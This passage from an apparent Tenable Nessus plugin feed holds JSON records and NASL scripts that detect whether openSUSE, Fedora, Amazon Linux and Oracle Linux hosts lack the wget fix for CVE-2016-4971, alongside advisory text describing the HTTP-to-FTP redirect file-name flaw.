"p-cpe:/a:novell:opensuse:wget-debugsource", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-973.NASL", "href": "https://www.tenable.com/plugins/nessus/92931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-973.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92931);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-973)\");\n script_summary(english:\"Check for the openSUSE-2016-973 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issue :\n\n - CVE-2016-4971: HTTP to a FTP redirection file name\n confusion vulnerability (boo#984060).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"wget-1.16-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"wget-debuginfo-1.16-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"wget-debugsource-1.16-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:22:32", "description": "Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T00:00:00", "type": "nessus", "title": "Fedora 23 : wget (2016-2db8cbc2fd)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-2DB8CBC2FD.NASL", "href": "https://www.tenable.com/plugins/nessus/92074", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2db8cbc2fd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92074);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"FEDORA\", value:\"2016-2db8cbc2fd\");\n\n script_name(english:\"Fedora 23 : wget (2016-2db8cbc2fd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2db8cbc2fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"wget-1.18-1.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:22:45", "description": "Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T00:00:00", "type": "nessus", "title": "Fedora 24 : wget (2016-e14374472f)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-E14374472F.NASL", "href": "https://www.tenable.com/plugins/nessus/92186", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-e14374472f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92186);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"FEDORA\", value:\"2016-e14374472f\");\n\n script_name(english:\"Fedora 24 : wget (2016-e14374472f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-e14374472f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"wget-1.18-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:22:21", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.\n(CVE-2016-4971)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-15T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : wget (ALAS-2016-720)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:wget", "p-cpe:/a:amazon:linux:wget-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-720.NASL", "href": "https://www.tenable.com/plugins/nessus/92222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-720.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92222);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"ALAS\", value:\"2016-720\");\n\n script_name(english:\"Amazon Linux AMI : wget (ALAS-2016-720)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GNU wget before 1.18 allows remote servers to write to arbitrary files\nby redirecting a request from HTTP to a crafted FTP resource.\n(CVE-2016-4971)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-720.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update wget' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"wget-1.18-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"wget-debuginfo-1.18-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T17:02:32", "description": "From Red Hat Security Advisory 2016:2587 :\n\nAn update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-11T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : wget (ELSA-2016-2587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:wget", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/94708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2587 and \n# Oracle Linux Security Advisory ELSA-2016-2587 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94708);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"Oracle Linux 7 : wget (ELSA-2016-2587)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2587 :\n\nAn update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-November/006485.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T17:02:34", "description": "An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise 